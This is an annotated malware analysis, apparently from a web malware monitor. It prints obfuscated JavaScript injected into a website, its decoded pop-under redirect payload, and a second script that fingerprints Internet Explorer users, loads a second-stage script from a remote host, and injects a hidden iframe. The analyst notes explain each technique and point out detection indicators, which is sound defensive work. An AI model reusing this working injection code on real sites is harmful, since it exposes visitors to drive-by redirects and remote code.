- /*
- * Quttera web malware monitor detected suspicious obfuscated JavaScript code redirecting the user
- * to the malicious URL http://worldfunnypics.com/index.php, which in turn injects further malicious
- * JavaScript code and hidden references to other malicious domains.
- */
- /*
- * initial threat dump
- */
- document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44 .... /* 10k characters skipped */ ... %3E%3C%62%6F%64%79%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E%09')); // Analyst note: unescape() decodes the percent-encoded string and document.write() injects the result into the page; the visible prefix decodes to '<!DOCTYPE HTML PUBLIC "-//W3C//D', i.e. a complete HTML document is hidden in the string. A long percent-encoded literal fed to document.write(unescape(...)) is a useful static detection pattern.
- /*
- * decoded payload
- */
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
- <script type="text/javascript">
- var puShown = false; // Analyst note: set to true by doOpen() after a popup has been opened, so at most one popup is opened per page load
- var PopWidth = 1370; // popup width passed to window.open() in doOpen()
- var PopHeight = 800; // popup height passed to window.open() in doOpen()
- var PopFocus = 0; // 0 makes doOpen() blur the new window right after opening it (pop-under behaviour)
- var _Top = null; // window used for measurements and for window.open(); assigned in initPu()
- function GetWindowHeight() { // Analyst note: returns the viewport height of the _Top window, or 0 if none of the three probes below yields a value
- var myHeight = 0;
- if (typeof (_Top.window.innerHeight) == 'number') { // first choice: window.innerHeight
- myHeight = _Top.window.innerHeight;
- } else if (_Top.document.documentElement && _Top.document.documentElement.clientHeight) { // fallback: documentElement.clientHeight
- myHeight = _Top.document.documentElement.clientHeight;
- } else if (_Top.document.body && _Top.document.body.clientHeight) { // last fallback: body.clientHeight
- myHeight = _Top.document.body.clientHeight;
- }
- return myHeight;
- }
- function GetWindowWidth() { // Analyst note: returns the viewport width of the _Top window, or 0 if none of the three probes below yields a value
- var myWidth = 0;
- if (typeof (_Top.window.innerWidth) == 'number') { // first choice: window.innerWidth
- myWidth = _Top.window.innerWidth;
- } else if (_Top.document.documentElement && _Top.document.documentElement.clientWidth) { // fallback: documentElement.clientWidth
- myWidth = _Top.document.documentElement.clientWidth;
- } else if (_Top.document.body && _Top.document.body.clientWidth) { // last fallback: body.clientWidth
- myWidth = _Top.document.body.clientWidth;
- }
- return myWidth;
- }
- function GetWindowTop() { // Analyst note: returns the vertical screen position of the _Top window
- return (_Top.window.screenTop != undefined) ? _Top.window.screenTop : _Top.window.screenY; // screenTop when the browser defines it, otherwise screenY
- }
- function GetWindowLeft() { // Analyst note: returns the horizontal screen position of the _Top window
- return (_Top.window.screenLeft != undefined) ? _Top.window.screenLeft : _Top.window.screenX; // screenLeft when the browser defines it, otherwise screenX
- }
- function doOpen(url) { // Analyst note: opens one popup centred over the _Top window, pushes it behind the current window when PopFocus is 0, then navigates it to `url`. Returns the popup window object, the falsy result of window.open() if the popup was blocked, or true if a popup was already shown.
- var popURL = "about:blank" // the popup is opened on about:blank first; the real destination is assigned later in Main()
- var popID = "ad_" + Math.floor(89999999 * Math.random() + 10000000); // window name: "ad_" followed by a random 8-digit number
- var pxLeft = 0;
- var pxTop = 0;
- pxLeft = (GetWindowLeft() + (GetWindowWidth() / 2) - (PopWidth / 2)); // centre the popup horizontally over the _Top window
- pxTop = (GetWindowTop() + (GetWindowHeight() / 2) - (PopHeight / 2)); // centre the popup vertically over the _Top window
- if (puShown == true) { // only one popup per page load
- return true;
- }
- var PopWin = _Top.window.open(popURL, popID, 'toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=' + pxTop + ',left=' + pxLeft + ',width=' + PopWidth + ',height=' + PopHeight);
- if (PopWin) { // falsy when the browser blocked the popup
- puShown = true;
- if (PopFocus == 0) {
- PopWin.blur(); // take focus away from the new window so it ends up behind the page the user was on
- if (navigator.userAgent.toLowerCase().indexOf("applewebkit") > -1) { // extra blur/focus cycle applied only to WebKit-based user agents
- _Top.window.blur();
- _Top.window.focus();
- }
- }
- PopWin.Init = function (e) { // helper attached to the popup object; invoked below with the popup itself as `e`
- with(e) { // NOTE(review): with(e) puts the popup's properties in scope, so window/opener/Params below presumably resolve against the popup - confirm
- Params = e.Params;
- Main = function () {
- if (typeof window.mozPaintCount != "undefined") { // mozPaintCount is a Gecko-only property, so this branch targets Firefox
- var x = window.open("about:blank"); // opens and immediately closes a throwaway window - presumably a focus trick; confirm
- x.close();
- }
- var popURL = Params.PopURL;
- try {
- opener.window.focus(); // hand focus back to the opening page; errors are deliberately ignored
- } catch (err) {}
- window.location = popURL; // navigate the popup from about:blank to the real destination
- }
- Main();
- }
- };
- PopWin.Params = {
- PopURL: url
- }
- PopWin.Init(PopWin);
- }
- return PopWin;
- }
- function setCookie(name, value, time) { // Analyst note: writes a site-wide (path=/) cookie that expires `time` milliseconds from now
- var expires = new Date();
- expires.setTime(expires.getTime() + time); // `time` is added to a millisecond timestamp
- document.cookie = name + '=' + value + '; path=/;' + '; expires=' + expires.toGMTString(); // the concatenation yields "path=/;; expires=..." (doubled semicolon); `value` is written without escaping
- }
- function getCookie(name) { // Analyst note: returns the value of the first cookie named `name`, or null when no cookie has that name
- var cookies = document.cookie.toString().split('; ');
- var cookie, c_name, c_value;
- for (var n = 0; n < cookies.length; n++) {
- cookie = cookies[n].split('=');
- c_name = cookie[0];
- c_value = cookie[1]; // only the text up to the next '=' is kept, so a value containing '=' is truncated
- if (c_name == name) {
- return c_value;
- }
- }
- return null;
- }
- function initPu() { // Analyst note: selects the window to operate on and hooks every click on the document to checkTarget()
- _Top = self; // default: the window this script runs in
- if (top != self) { // running inside a frame
- try {
- if (top.document.location.toString()) _Top = top; // use the top-level window when its document is readable; a cross-origin access throws and leaves _Top as self
- } catch (err) {}
- }
- if (document.attachEvent) { // legacy IE event model
- document.attachEvent('onclick', checkTarget);
- } else if (document.addEventListener) {
- document.addEventListener('click', checkTarget, false);
- }
- }
- function checkTarget(e) { // Analyst note: click handler; opens the pop-under at most once per cookie lifetime
- if (!getCookie('popundr')) { // the 'popundr' cookie is the "already shown" marker and a useful host-side indicator
- var e = e || window.event; // normalised event object; not used afterwards
- var win = doOpen('http://bit.ly/13mOaly'); // destination is a URL-shortener link; its content is shown further down in this dump
- setCookie('popundr', 1, 24 * 60 * 60 * 1000); // 24 hours in milliseconds; set whether or not the popup actually opened
- }
- }
- setTimeout(function () { // Analyst note: the click hook is installed only after 90000 ms (90 seconds); a scanner or sandbox that watches the page for a shorter time would presumably not observe the pop-under behaviour
- initPu();
- }, 90000) //-->
- </script>
- </head>
- <body></body>
- </html>
- /*
- * content of http://bit.ly/13mOaly
- */
- <a href="http://hidethis.co/?url=http://www.amazon.com/?&tag=worldfunnypic-20&camp=216797&creative=394541&linkCode=ur1&adid=0EW2CHFN51JXZM4GJ9C1&&ref-refURL=http://worldfunnypics.com/&referer=http://worldfunnypics.com/index.php">moved here</a>
- /*
- * malicious JavaScript injected by visiting http://worldfunnypics.com/index.php
- */
- /* sQB1P5VzfTJR6s34jdD6gslNw6r */
- var jRJV7 = "\x75serid\x4108\x31\x37FB\x32\x35"; // Analyst note: hex escapes decode to "useridA0817FB25"; used as the name of the marker cookie
- var uVp14M = "28"; // value stored in, and compared against, the marker cookie
- var wkskmqN = 1; // when truthy, chFUHfD() skips browsers that already carry the marker cookie
- function BSROd(ThAa1) { // Analyst note: cookie getter; returns the unescaped value of the cookie named ThAa1, undefined when no cookie has that name, or null when document.cookie is empty
- var Mhw543l;
- var onkuv = document.cookie;
- if (!onkuv) {
- return null;
- }
- onkuv = onkuv.replace(/\s/g, ""); // strip all whitespace so the split on ";" yields bare name=value pairs
- var jmv85 = onkuv.split(";");
- for (var i = 0; i < jmv85.length; i++) {
- var yVR7o = jmv85[i].split("=");
- if (yVR7o[0] == ThAa1) {
- Mhw543l = unescape(yVR7o[1]);
- break;
- }
- }
- return Mhw543l;
- };
- function bn5wPSP(ThAa1, tjHOR77, dfe6VvH) { // Analyst note: cookie setter; ThAa1 = cookie name, tjHOR77 = value, dfe6VvH = lifetime in hours
- var exp = new Date();
- var HREqB = exp.getTime() + (dfe6VvH * 60 * 60 * 1000); // hours converted to milliseconds
- exp.setTime(HREqB);
- var sD8ztEj = ThAa1 + "=" + escape(tjHOR77) + "; e\x78p\x69\x72\x65s=" + exp.toGMTString() + "\x3b d\x6fm\x61i\x6e=" + document.domain; // hex escapes decode to "; expires=" and "; domain=", so the cookie is scoped to the infected page's own domain
- document.cookie = sD8ztEj;
- };
- function OR8zbpb() { // Analyst note: referenced by the onload attribute of the iframe built in UGus0(); marks this browser as served
- bn5wPSP(jRJV7, uVp14M, 48); // sets the marker cookie for 48 hours
- };
- function UGus0() { // Analyst note: decodes a URL from the global ad_banner_content_str and loads it in an invisible iframe appended to the page body
- try {
- if (ad_banner_content_str.length == 0) { // ad_banner_content_str is not defined in this listing - presumably supplied by the script that chFUHfD() loads; confirm
- bn5wPSP(jRJV7, uVp14M, 24); // empty string: set the marker cookie for 24 hours and do nothing else
- return;
- }
- var xpNcRs = unescape(ad_banner_content_str.replace(/[g-zG-Z]+/g, "").replace(/[=\-!@$;.,]+/g, "%")); // decoding scheme: drop every letter g-z/G-Z, turn each run of = - ! @ $ ; . , into "%", then percent-decode what remains
- var T7uhy = document.createElement("\x44I\x56"); // "DIV"
- T7uhy.style.cssText = "po\x73\x69tion:ab\x73ol\x75t\x65;left\x3a\x30\x70x;t\x6fp:2\x30\x30px;\x6fpa\x63\x69\x74\x79:0\x3bfil\x74er:alpha(o\x70a\x63\x69\x74y=\x30)\x3b"; // decodes to "position:absolute;left:0px;top:200px;opacity:0;filter:alpha(opacity=0);" - the container is fully transparent
- T7uhy.innerHTML = "<ifr\x61me \x6fn\x6c\x6fad\x3d\x27O\x52\x38z\x62pb\x28);\x27 \x73r\x63=\x27" + xpNcRs + "'\x20width\x3d19 \x68\x65i\x67ht=1\x39 f\x72\x61\x6deb\x6frde\x72\x3d0 \x73c\x72\x6flli\x6eg=\x27no\x27></\x69\x66rame\x3e"; // decodes to <iframe onload='OR8zbpb();' src='<decoded URL>' width=19 height=19 frameborder=0 scrolling='no'></iframe>; a 19x19 iframe inside a zero-opacity element is a detection pattern for hidden-iframe injection
- document.body.appendChild(T7uhy);
- } catch (e) {} // every error is swallowed, so a failure leaves no visible trace on the page
- };
- function chFUHfD() { // Analyst note: entry point of the injected script; filters visitors by user agent and marker cookie, then loads a second-stage script from a remote host
- var OAA9NjP = navigator.userAgent;
- if (OAA9NjP.indexOf("W\x69\x6ed\x6fws") == -1 || OAA9NjP.indexOf("M\x53\x49E") == -1) { // strings decode to "Windows" and "MSIE": any user agent lacking either one is left alone
- return 0;
- }
- if (wkskmqN) {
- try {
- if (BSROd(jRJV7) == uVp14M) { // marker cookie already present: this browser was served before, so stop
- return false;
- }
- } catch (e) {};
- }
- try {
- var qVgRS = 0;
- if (OAA9NjP.indexOf("\x4d\x53IE") != -1) { // "MSIE" again; always true here because of the early return above
- try {
- qVgRS = sxj7zbe(); // called before its declaration inside the same block; NOTE(review): presumably an engine check that relies on how function declarations in blocks are hoisted - confirm
- function sxj7zbe() {
- return 0;
- }
- } catch (e) {
- qVgRS = 1; // the call threw: the loader below is skipped
- }
- }
- if (qVgRS == 0) {
- var yAu0FbO = document.createElement("\x53CR\x49\x50T"); // "SCRIPT"
- yAu0FbO.type = "te\x78\x74\x2fj\x61vasc\x72\x69pt"; // "text/javascript"
- yAu0FbO.onreadystatechange = function () {
- if (this.readyState == "l\x6fa\x64\x65d" || this.readyState == "com\x70le\x74\x65") { // "loaded" / "complete": run UGus0() once the remote script has arrived
- UGus0();
- }
- };
- yAu0FbO.src = "http:\x2f/c\x64\x6e\x2ein\x73p\x69ra\x74ional\x79\x6f\x75\x74ubevideos\x2e\x63om\x2f\x6b"; // decodes to hxxp://cdn[.]inspirationalyoutubevideos[.]com/k (defanged here) - the second-stage host, a network indicator for blocklists and proxy-log searches
- document.body.appendChild(yAu0FbO);
- }
- } catch (e) {}; // errors are swallowed silently
- };
- if (document.addEventListener) { // Analyst note: schedules chFUHfD() to run once the DOM is ready, using one of two mechanisms
- document.addEventListener("DOMC\x6f\x6e\x74entL\x6fa\x64\x65d", chFUHfD, false); // event name decodes to "DOMContentLoaded"
- } else {
- document.write("<" + "scri\x70t id\x3d\x27a\x5ay\x55\x49cac\x311\x27 d\x65\x66e\x72\x20src\x3djavascr\x69p\x74:vo\x69\x64\x280\x29>\x3c" + "\/\x73\x63r\x69pt\x3e"); // fallback without addEventListener: writes <script id='aZyUIcac11' defer src=javascript:void(0)></script> into the page
- var script = document.getElementById("\x61\x5ayUIc\x61\x6311"); // "aZyUIcac11", the element written on the previous line
- script.onreadystatechange = function () {
- if (this.readyState == "\x63o\x6d\x70lete") { // "complete": the deferred dummy script acts as a DOM-ready signal
- chFUHfD();
- }
- };
- } /* FUhPrrPetzKkCftQu */